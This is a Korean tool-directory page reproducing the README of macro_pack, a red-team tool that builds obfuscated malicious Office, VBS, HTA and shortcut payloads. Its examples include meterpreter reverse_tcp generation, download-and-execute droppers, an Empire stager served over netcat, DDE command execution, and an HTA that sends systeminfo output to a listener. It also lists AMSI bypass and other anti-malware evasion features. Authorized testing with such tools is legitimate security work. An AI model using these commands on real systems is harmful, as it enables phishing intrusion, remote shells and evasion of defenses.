Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
macro_pack — macro_pack은 @EmericNasi가 만든 도구로, 침투 테스트(pentest), 데모, 소셜 엔지니어링 평가를 위해 Office 문서, VB 스크립트, 바로 가기 및 기타 형식의 난독화와 생성을 자동화하는 데 사용됩니다. macro_pack의 목표는 악용(exploitation)과 안티멀웨어 우회를 간소화하고, 악성 매크로 및 스크립트 생성부터 최종 문서 생성까지의 프로세스를 자동화하는 것입니다. 또한 레드팀 또는 보안 연구에 유용한 많은 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/sevagas/macro_pack
Phishing ToolsExploit FrameworksPayload GenerationLateral MovementScripting & AutomationWeb Application ExploitationPenetration TestingSocial EngineeringRed TeamingArchived
GitHubsevagas/macro_pack

macro_pack

2.3k414212년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

macro_pack은 @EmericNasi가 만든 도구로, 침투 테스트(pentest), 데모, 소셜 엔지니어링 평가를 위해 Office 문서, VB 스크립트, 바로 가기 및 기타 형식의 난독화와 생성을 자동화하는 데 사용됩니다. macro_pack의 목표는 악용(exploitation)과 안티멀웨어 우회를 간소화하고, 악성 매크로 및 스크립트 생성부터 최종 문서 생성까지의 프로세스를 자동화하는 것입니다. 또한 레드팀 또는 보안 연구에 유용한 많은 기능을 제공합니다.

저장소 보기웹사이트

Supported Python versions

macro_pack

간단한 설명


경고: MacroPack은 2021년부터 유지보수되지 않습니다. 전문가로서 초기 접근, 침해 가정, EDR 우회를 위한 공격적 정보보안 도구가 필요하다면 https://www.balliskit.com 을 확인하세요.


MacroPack Community는 MS Office 문서나 VBS 형식과 같은 레트로 포맷의 난독화 및 생성을 자동화하는 도구입니다. 또한 다양한 바로가기 형식을 처리합니다. 이 도구는 레드팀, 모의 침투, 데모, 사회공학 평가에 사용될 수 있습니다. MacroPack은 안티멀웨어 솔루션 우회를 단순화하고, VB 소스에서 최종 Office 문서 또는 기타 페이로드 유형으로의 프로세스를 자동화합니다. 사용법은 매우 간단합니다:

  • 구성이 필요 없음
  • 모든 작업을 단일 명령줄로 수행 가능
  • 대부분의 Office 형식 및 VBS 기반 형식 생성
  • 고급 사회공학 공격(이메일, USB 키 등)을 위해 설계된 페이로드

이 도구는 인기 있는 침투 테스트 도구(Metasploit, Empire 등)에서 생성된 페이로드와 호환됩니다. stdin에서 입력을 읽고 다른 도구로 조용히 출력할 수 있으므로 다른 도구와 결합하기도 쉽습니다. 이 도구는 Python3로 작성되었으며 Linux와 Windows 플랫폼에서 모두 작동합니다.

참고: Office 문서 자동 생성 또는 트로이 목마 기능을 위해서는 적절한 MS Office 응용 프로그램이 설치된 Windows 플랫폼이 필요합니다.

데모 1

난독화

이 도구는 다양한 난독화 기술을 모두 자동으로 사용합니다. 난독화 기능은 MacroPack으로 생성할 수 있는 모든 VBA 및 VBS 기반 형식과 호환됩니다. 기본 난독화(-o 옵션)에는 다음이 포함됩니다:

  • 함수 이름 변경
  • 변수 이름 변경
  • 공백 제거
  • 주석 제거
  • 문자열 인코딩

생성

MacroPack은 여러 종류의 MS Office 문서 및 스크립트 형식을 생성할 수 있습니다. 형식은 지정된 파일 확장자에 따라 자동으로 추측됩니다. 파일 생성은 --generate 또는 -G 옵션을 사용하여 수행됩니다.

MacroPack 프로 버전에서는 --trojan 또는 -T 옵션을 사용하여 기존 Office 파일에 트로이 목마를 심을 수도 있습니다.

지원되는 Ms Office 형식:

  • MS Word (.doc, .docm, .docx, .dotm)
  • MS Excel (.xls, .xlsm, .xslx, .xltm)
  • MS PowerPoint (.pptm, .potm)
  • MS Access (.accdb, .mdb)
  • MS Visio (.vsd,.vsdm)
  • MS Project (.mpp)

지원되는 스크립팅(txt) 형식:

  • VBA 텍스트 파일 (.vba)
  • VBS 텍스트 파일 (.vbs)
  • Windows Script File (.wsf)
  • Windows Script Components 스크립틀릿 (.wsc, .sct)
  • HTML 응용 프로그램 (.hta)
  • XSLT 스타일시트 (.xsl) (네, MS XSLT에는 스크립트가 포함됩니다^^)

지원되는 바로가기/셸 형식:

  • Shell Link (.lnk)
  • Explorer Command File (.scf)
  • URL 바로가기 (.url)
  • Groove 바로가기 (.glk)
  • 설정 바로가기 (.settingcontent-ms)
  • MS 라이브러리 (.library-ms)
  • Setup Information (.inf)
  • Excel Web Query (.iqy)
  • Visual Studio 프로젝트 (.csproj)
  • 명령줄 (.cmd)
  • SYmbolic LinK (.slk) 프로 버전 전용
  • Compressed HTML Help (.chm) 프로 버전 전용

모든 스크립팅 및 바로가기 형식(LNK 제외)은 MacroPack Linux 버전에서도 생성할 수 있습니다.

윤리적 사용

이 소프트웨어는 레드팀 활동, 침투 테스트, 피싱 시뮬레이션, 보안 연구 또는 기타 형태의 보안 평가 맥락에서만 사용해야 하며, 시스템 소유자의 합법적이고 공식적인 승인을 받아야 합니다. 사전 동의 없이 대상을 공격하는 데 이 소프트웨어를 사용하는 것은 금지되어 있으며 불법입니다. 사용자는 모든 관련 지역, 주, 연방 및 국가 법률을 준수할 책임이 있습니다. 당사는 어떠한 책임도 지지 않으며, 이 소프트웨어 사용으로 인해 발생할 수 있는 오용이나 손해에 대해 책임을 지지 않습니다.

프로 모드에 관하여...

MacroPack의 모든 기능과 옵션이 MacroPack Community에서 제공되는 것은 아닙니다. 온라인에서는 커뮤니티 버전만 사용할 수 있습니다. 프로 버전의 기능은 진정으로 프로세스를 "무기화"하기 때문에 전문가만 접근할 수 있습니다. 프로 모드에는 다음과 같은 기능이 포함됩니다:

  • 고급 안티멀웨어 우회
  • 고급 셸코드 주입 방법
  • 명령줄 난독화 (Dosfuscation)
  • ASR 및 AMSI 우회
  • 자체 압축 해제 VBA/VBS 페이로드
  • 기존 MS Office 문서, 도움말 파일 및 Visual Studio 프로젝트 트로이 목마화
  • 디코이 페이로드 포함
  • DCOM 개체를 사용한 측면 이동
  • 역공학 방지
  • 샌드박스 탐지
  • Excel 4.0 SYLK 및 컴파일된 도움말 파일과 같은 추가 형식 지원
  • 비정형 형식에서 고급 VB 페이로드 실행
  • 무기화된 템플릿 및 추가 템플릿 (예: EMPIRE, AUTOSHELLCODE)
  • Excel 4.0 매크로 (XLM)
  • 그 외 다수...

BallisKit Vimeo 채널에서 몇 가지 짧은 데모 비디오를 확인할 수 있습니다.

중요: MacroPack 프로에 관해 저에게 연락하고 싶다면 emeric.nasi [at] sevagas.com 이메일 주소를 사용하세요. 프로 버전에 대한 익명 문의에는 응답하지 않으며, 전문 이메일에만 응답합니다.

실행/설치

Windows 바이너리 실행

  1. https://github.com/sevagas/macro_pack/releases/ 에서 최신 바이너리를 받으세요.
  2. 정품 Microsoft Office가 설치된 PC에 바이너리를 다운로드하세요.
  3. 콘솔을 열고, CD로 바이너리 디렉터리로 이동한 후 바이너리를 호출하면 됩니다. 정말 간단합니다!```bash macro_pack.exe --help
### 소스에서 설치

MacroPack을 빌드하려면 Windows 시스템에서 작업해야 합니다. 의존성을 다운로드하고 설치하십시오:```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

이 도구는 python 3로 작성되었으므로, python3 설치로 시작하면 됩니다. 예:```bash python3 macro_pack.py --help

or

python macro_pack.py --help # if python3 is default install

pyinstaller를 사용하여 독립 실행형 exe 파일을 만들려면:  
* pyinstaller 설치: pip install pyinstaller  
* "build.bat" 스크립트를 더블 클릭하세요.  

결과로 생성된 macro\_pack.exe는 **bin** 디렉토리 안에 있습니다.  

## 몇 가지 예제  

### MacroPack Community  

- 지원되는 모든 파일 형식 나열```bash
macro_pack.exe --listformats
  • 사용 가능한 모든 템플릿 나열```bash macro_pack.exe --listtemplates
- msfvenom으로 생성된 VBA 파일을 난독화하고 결과를 새 VBA 파일에 저장합니다.```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
  • Empire 스테이저 VBA 파일을 난독화하고 MS Word 문서를 생성합니다:```bash macro_pack.exe -f empire.vba -o -G myDoc.docm
- 난독화된 드로퍼가 포함된 MS Excel 파일 생성 (payload.exe 다운로드 및 dropped.exe로 저장)```bash
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 
  • 공유 폴더 내에 난독화된 VBA 리버스 미터프리터 페이로드가 포함된 Word 97 문서 생성```bash msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \REMOTE-PC\Share\meter.doc
- DROPPER_PS 템플릿을 사용하여 powershell.exe 없이 Empire Launcher stager를 다운로드 및 실행```bash
# 1 Generate a file containing Empire lauchcher 
# 2 Make that file available on web server, ex with netcat:
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
# 3 Use macro\_pack  to generate DROPPER_PS payload in Excel file
echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
  • 동적 데이터 교환(DDE) 공격을 통해 calc.exe 실행```bash echo calc.exe | macro_pack.exe --dde -G calc.xslx
<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/23fa8cfadc283a7abf02bde5fd10748c8c1d90bc3d977ee47024fe4e9d963824.png" alt="Excel DDE 데모"></p>

- PowerShell을 사용하여 Dynamic Data Exchange (DDE) 공격을 통해 파일을 다운로드하고 실행```bash
# 1 Change the target file URL in resources\community\ps_dl_exec.cmd
# 2 Embed download execute cmd in document
macro_pack.exe --dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.xslx
  • Excel 웹 쿼리 파일과 DDE를 통해 명령(notepad.exe) 실행```bash

1 Create dde.dat file with next content

=cmd|' /c notepad.exe'!A1

2 Host dde.dat on webserver, ex. using macro_pack -l

3 Generate .iqy file

macro_pack.exe -G dde.iqy

<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/26c6e5a38eb09ae914c743b473890cef40632ccbd25bce0a895f9f4770377f7d.png" alt="IQY 데모"></p>


 - 난독화된 meterpreter reverse TCP VBS 파일을 생성하고 실행합니다. ```batch
# 1 Generate obfuscated VBS based on meterpreter template as well as Metasploit resource file
echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs
# 2 On attacker machine Setup meterpreter listener
msfconsole -r meterpreter.rc
# 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)
%windir%\SysWoW64\wscript meter.vbs

  • 난독화된 HTA 파일을 생성하여 "systeminfo"를 실행하고 결과를 192.168.0.5에서 수신 대기 중인 다른 macro_pack으로 반환합니다.```batch

1 Generate HTA file with REMOTE_CMD template

echo http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t REMOTE_CMD -o -G info.hta

2 On 192.168.0.5 open macro_pack as http listener

macro_pack.exe -l . --port=1234

3 run hta file with mshta

mshta.exe full/path/to/info.hta

- 클릭 시 로컬 HTA 파일을 실행하는 URL 바로가기 생성```batch
 echo "file://C:\Users\username\Desktop\hello.hta" | macro_pack.exe -G yop.url
  • calc.exe 아이콘을 사용하여 calc.exe를 실행하는 cmd 명령을 실행하는 lnk 바로가기 생성```batch echo '"c:\Windows\System32\cmd.exe /c calc.exe" "calc.exe"' | macro_pack.exe -G calc.lnk
### MacroPack Pro 예시 몇 가지
도구 다운로드